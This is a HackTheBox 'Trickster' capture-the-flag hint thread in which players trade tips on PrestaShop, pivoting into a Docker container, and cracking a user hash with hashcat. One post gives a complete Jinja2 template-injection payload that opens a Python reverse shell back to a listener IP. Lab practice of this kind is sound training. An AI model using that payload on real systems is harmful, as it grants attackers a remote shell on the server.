Trickster Discussion [HTB] [HINTS]

binaryexploiter · September 27, 2024, 9:57am

where can i get prestashop version

Hex · September 27, 2024, 1:25pm

Open the admin panel, you will see the version in the login page

GreyBeardFrog · September 27, 2024, 1:36pm

Really interesting one. I am stuck at the connect to container though. My sshutle worked one time and that was it. Any hint how to connect to the docker? I did find the ip of the docker. Not sure how to connect to it now

lavande · September 27, 2024, 2:05pm

me too. exploit.py only returns sometimes 404, sometimes 403.httpsever"GET 200",but no shell returns

caesartcs · September 27, 2024, 3:56pm

i just use the normal ssh binary for port forwarding and then leave that running

caesartcs · September 27, 2024, 3:57pm

disregard - i managed thx

dannyk · September 27, 2024, 4:09pm

If you’d see that. Then your payload is incorrect.

Try this

listen_ip="your_ip"
listen_port=9003
print(f"""
        {{% for x in ().__class__.__base__.__subclasses__() %}}
        {{% if "warning" in x.__name__ %}}
        {{{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\\"{listen_ip}\\",{listen_port}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\\"/bin/bash\\")'").read()}}}}
        {{% endif %}}
        {{% endfor %}}
        """)

caesartcs · September 27, 2024, 4:16pm

I think it was either new lines or the tabs that messed up my payload. all else was ok. testing around now to figure it out

btw thank you for your help @dannyk

anoymousdoomer · September 27, 2024, 4:21pm

did u find the hash?

caesartcs · September 27, 2024, 4:23pm

in hindsight, my issue was not the payload but that URL in general and the Notification URL List both need to be set to something legitimate that you have…meaning some server you stand up for this exploit i just always had them mismatch

hope this helps someone else

anoymousdoomer · September 27, 2024, 4:24pm

guys how did u craked the hash ?

anoymousdoomer · September 27, 2024, 4:25pm

i can’t be able to crack the hash

caesartcs · September 27, 2024, 4:26pm

hashcat, put the hash in a file and crack it with rockyou. Check your mode and make sure it matches

anoymousdoomer · September 27, 2024, 4:26pm

i tried with 100 mode but no results

caesartcs · September 27, 2024, 4:27pm

the hash you should be cracking starts with a $
either you are cracking something else or do not have the whole thing

edit: its not -m 100

anoymousdoomer · September 27, 2024, 4:28pm

with the hash is anything on http://shop.trickster.htb/.git/refs/heads/admin_panel so yeah i tried mutch times with differents wordlists but with no success

anoymousdoomer · September 27, 2024, 4:29pm

oh good thanks bro , where can i find this hash?

caesartcs · September 27, 2024, 4:30pm

i know some folks keep looking at the .git folder - but i did not use that at all
to find the user hash, try the mysql db

anoymousdoomer · September 27, 2024, 4:51pm

the index file is a file link how who could read a file linnk?

anoymousdoomer · September 27, 2024, 6:05pm

help me bro iam stuck to find the hash like 2 days